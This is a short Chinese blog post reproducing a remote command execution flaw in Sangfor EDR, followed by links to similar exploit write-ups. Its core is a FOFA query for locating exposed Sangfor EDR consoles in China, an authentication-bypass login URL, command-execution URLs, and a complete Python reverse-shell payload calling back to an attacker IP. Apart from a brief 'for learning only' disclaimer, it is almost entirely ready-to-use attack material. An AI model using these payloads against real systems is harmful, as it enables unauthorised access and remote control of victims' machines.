深信服EDR远程命令执行漏洞复现

作者: migrate_ | 来源:发表于2020-08-31 10:01 被阅读0次

深信服EDR远程命令执行漏洞复现
深信服EDR远程命令执行
2020-12-31PHPMailer远程命令执行漏洞复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
Apache Shiro1.2.4漏洞分析
Drupal远程命令执行漏洞复现
Joomla远程命令执行漏洞复现
Fastjson远程命令执行漏洞复现
CVE-2019-0708漏洞复现
Samba远程命令执行漏洞（CVE-2017-7494）

0x01仅供交流与学习使用，请勿用于非法用途

目标

title="终端检测响应平台" && country="CN"

payload

#越权登录
https://ip:xx/ui/login.php?user=admin   #(用户名必须存在)
#命令执行
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
#反弹shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

1.jpg

2.jpg

3.jpg

深信服EDR远程命令执行漏洞复现
0x01仅供交流与学习使用，请勿用于非法用途目标 payload
深信服EDR远程命令执行
0x00简介深信服EDR属于终端安全产品部，是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全...
2020-12-31PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类，用于多个开...
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现一、漏洞描述远程执行代码漏洞存在于 HTTP ...
Apache Shiro1.2.4漏洞分析
最近关注到Apache shiro 1.2.4远程命令执行漏洞并决定对其进行研究并复现。一、复现环境： 1.Ap...
Drupal远程命令执行漏洞复现
漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞，影响为Critical。这是Dru...
Joomla远程命令执行漏洞复现
参考文章 https://www.leavesongs.com/PENETRATION/joomla-unseri...
Fastjson远程命令执行漏洞复现
最近学长找到我，说甲方公司最近可能出现一些安全隐患，因为该公司的接口平台使用的是fastjson，让我先本地复现一...
CVE-2019-0708漏洞复现
Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)漏洞复现详细描述 ...
Samba远程命令执行漏洞（CVE-2017-7494）
一、实验目标理解Samba远程命令执行漏洞的原理掌握怎么利用Samba远程命令执行漏洞链接：https:/...